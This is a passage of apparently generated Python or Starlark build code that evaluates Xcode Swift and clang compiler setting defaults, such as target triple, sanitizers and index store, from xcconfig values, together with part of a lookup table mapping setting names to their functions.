if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "SWIFT_RESPONSE_FILE_PATH_{eval_val_0}_{eval_val_1}".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1)
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, eval_val_2)
def _com_apple_xcode_tools_swift_compiler__SWIFT_DEPLOYMENT_TARGET__DefaultValue(xcconfigs, id_configs):
# $($(DEPLOYMENT_TARGET_SETTING_NAME))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "DEPLOYMENT_TARGET_SETTING_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = eval_val_0
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_xcode_tools_swift_compiler__SWIFT_TARGET_TRIPLE__DefaultValue(xcconfigs, id_configs):
# $(CURRENT_ARCH)-apple-$(SWIFT_PLATFORM_TARGET_PREFIX)$(SWIFT_DEPLOYMENT_TARGET)$(LLVM_TARGET_TRIPLE_SUFFIX)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CURRENT_ARCH"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SWIFT_PLATFORM_TARGET_PREFIX"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "SWIFT_DEPLOYMENT_TARGET"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
eval_val_3 = ""
eval_key_3 = "LLVM_TARGET_TRIPLE_SUFFIX"
if eval_key_3 in xcconfigs:
eval_val_3 = xcconfigs[eval_key_3]
used_user_content = True
elif eval_key_3 in id_configs:
opt = id_configs[eval_key_3]
if "DefaultValue" in opt:
(eval_val_3_used_user_content, eval_val_3) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_3_used_user_content
return (used_user_content, "{eval_val_0}-apple-{eval_val_1}{eval_val_2}{eval_val_3}".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1, eval_val_2 = eval_val_2, eval_val_3 = eval_val_3))
def _com_apple_xcode_tools_swift_compiler__SWIFT_VERSION__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_swift_compiler__SWIFT_SERIALIZE_DEBUGGING_OPTIONS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_APP_EXTENSION__DefaultValue(xcconfigs, id_configs):
# $(APPLICATION_EXTENSION_API_ONLY)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "APPLICATION_EXTENSION_API_ONLY"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_LINK_OBJC_RUNTIME__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__CLANG_COVERAGE_MAPPING__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__CLANG_COVERAGE_MAPPING_LINKER_ARGS__DefaultValue(xcconfigs, id_configs):
# $(CLANG_COVERAGE_MAPPING)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_COVERAGE_MAPPING"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_REFLECTION_METADATA_LEVEL__DefaultValue(xcconfigs, id_configs):
# all
return (False, "all")
def _com_apple_xcode_tools_swift_compiler__SWIFT_BITCODE_GENERATION_MODE__Condition(xcconfigs, id_configs):
# $(ENABLE_BITCODE) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_BITCODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_xcode_tools_swift_compiler__SWIFT_BITCODE_GENERATION_MODE__DefaultValue(xcconfigs, id_configs):
# $(BITCODE_GENERATION_MODE)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "BITCODE_GENERATION_MODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_ADDRESS_SANITIZER)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_ADDRESS_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__Condition(xcconfigs, id_configs):
# $(SWIFT_ADDRESS_SANITIZER) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SWIFT_ADDRESS_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_xcode_tools_swift_compiler__SWIFT_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_THREAD_SANITIZER__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_THREAD_SANITIZER)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_THREAD_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_TESTABILITY__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_TESTABILITY)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_TESTABILITY"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_SUPPRESS_WARNINGS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__SWIFT_TREAT_WARNINGS_AS_ERRORS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_PATH__DefaultValue(xcconfigs, id_configs):
# $(INDEX_DATA_STORE_DIR)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "INDEX_DATA_STORE_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_ENABLE__Condition(xcconfigs, id_configs):
# $(COMPILER_INDEX_STORE_ENABLE) == YES || ( $(COMPILER_INDEX_STORE_ENABLE) == Default && $(SWIFT_OPTIMIZATION_LEVEL) == '-Onone' )
used_user_content = False
eval_val_0 = ""
eval_key_0 = "COMPILER_INDEX_STORE_ENABLE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SWIFT_OPTIMIZATION_LEVEL"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 == "YES" or (eval_val_0 == "Default" and eval_val_1 == "-Onone")))
def _com_apple_xcode_tools_swift_compiler__SWIFT_INDEX_STORE_ENABLE__DefaultValue(xcconfigs, id_configs):
# $(INDEX_ENABLE_DATA_STORE)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "INDEX_ENABLE_DATA_STORE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_EMIT_MODULE_INTERFACE__DefaultValue(xcconfigs, id_configs):
# $(BUILD_LIBRARY_FOR_DISTRIBUTION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "BUILD_LIBRARY_FOR_DISTRIBUTION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_LIBRARY_EVOLUTION__DefaultValue(xcconfigs, id_configs):
# $(BUILD_LIBRARY_FOR_DISTRIBUTION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "BUILD_LIBRARY_FOR_DISTRIBUTION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
XCSPEC_EVALS = {
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_CONTAINER_OVERFLOW__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_CONTAINER_OVERFLOW__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_CONTAINER_OVERFLOW__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_CONTAINER_OVERFLOW__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_USE_AFTER_SCOPE__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_USE_AFTER_SCOPE__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_USE_AFTER_SCOPE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_USE_AFTER_SCOPE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ARC_MIGRATE_EMIT_ERROR__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ARC_MIGRATE_EMIT_ERROR__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ARC_MIGRATE_PRECHECK__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ARC_MIGRATE_PRECHECK__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_BITCODE_GENERATION_MODE__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_BITCODE_GENERATION_MODE__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_BITCODE_GENERATION_MODE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_BITCODE_GENERATION_MODE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_COLOR_DIAGNOSTICS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_COLOR_DIAGNOSTICS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING_LINKER_ARGS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING_LINKER_ARGS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_CXX_LANGUAGE_STANDARD__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_CXX_LANGUAGE_STANDARD__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_CXX_LIBRARY__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_CXX_LIBRARY__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_INFORMATION_LEVEL__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_INFORMATION_LEVEL__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_INFORMATION_LEVEL__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_INFORMATION_LEVEL__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_MODULES__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_MODULES__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_MODULES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_MODULES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_APP_EXTENSION__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_APP_EXTENSION__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_CODE_COVERAGE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_CODE_COVERAGE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_CPP_STATIC_DESTRUCTORS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_CPP_STATIC_DESTRUCTORS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULES__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULES__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_DEBUGGING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_DEBUGGING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_IMPLEMENTATION_OF__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_IMPLEMENTATION_OF__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_IMPLEMENTATION_OF__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_IMPLEMENTATION_OF__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_OBJC_ARC__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_OBJC_ARC__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_OBJC_WEAK__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_OBJC_WEAK__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_ENABLE__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_ENABLE__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_ENABLE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_ENABLE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_PATH__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_PATH__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_INSTRUMENT_FOR_OPTIMIZATION_PROFILING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_INSTRUMENT_FOR_OPTIMIZATION_PROFILING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_LINK_OBJC_RUNTIME__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_LINK_OBJC_RUNTIME__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MACRO_BACKTRACE_LIMIT__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MACRO_BACKTRACE_LIMIT__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_AUTOLINK__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_AUTOLINK__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_AUTOLINK__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_AUTOLINK__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_BUILD_SESSION_FILE__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_BUILD_SESSION_FILE__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_BUILD_SESSION_FILE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_BUILD_SESSION_FILE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_DISABLE_PRIVATE_WARNING__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_DISABLE_PRIVATE_WARNING__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_DISABLE_PRIVATE_WARNING__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_DISABLE_PRIVATE_WARNING__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_IGNORE_MACROS__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_IGNORE_MACROS__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_IGNORE_MACROS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_IGNORE_MACROS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_AFTER__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_AFTER__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_AFTER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_AFTER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_INTERVAL__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_INTERVAL__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_INTERVAL__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_INTERVAL__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_VALIDATE_SYSTEM_HEADERS__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_VALIDATE_SYSTEM_HEADERS__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_VALIDATE_SYSTEM_HEADERS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_VALIDATE_SYSTEM_HEADERS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_CACHE_PATH__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_CACHE_PATH__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_CACHE_PATH__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_CACHE_PATH__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_LSV__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_LSV__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_LSV__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_LSV__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_OPTIMIZATION_PROFILE_FILE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_OPTIMIZATION_PROFILE_FILE__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_RETAIN_COMMENTS_FROM_SYSTEM_HEADERS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_RETAIN_COMMENTS_FROM_SYSTEM_HEADERS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_ARCHS__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_ARCHS__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_ARCHS__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_ARCHS__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_VARIANTS__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_VARIANTS__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_THREAD_SANITIZER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_THREAD_SANITIZER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_TRIVIAL_AUTO_VAR_INIT__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_TRIVIAL_AUTO_VAR_INIT__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_INTEGER__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_INTEGER__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_INTEGER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_INTEGER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_NULLABILITY__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_NULLABILITY__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_NULLABILITY__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_NULLABILITY__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER__DefaultValue,
"com_apple_compilers_llvm_clang_1_0__CLANG_USE_OPTIMIZATION_PROFILE__Condition": _com_apple_compilers_llvm_clang_1_0__CLANG_USE_OPTIMIZATION_PROFILE__Condition,
"com_apple_compilers_llvm_clang_1_0__CLANG_USE_OPTIMIZATION_PROFILE__DefaultValue": _com_apple_compilers_llvm_clang_1_0__CLANG_USE_OPTIMIZATION_PROFILE__DefaultValue,
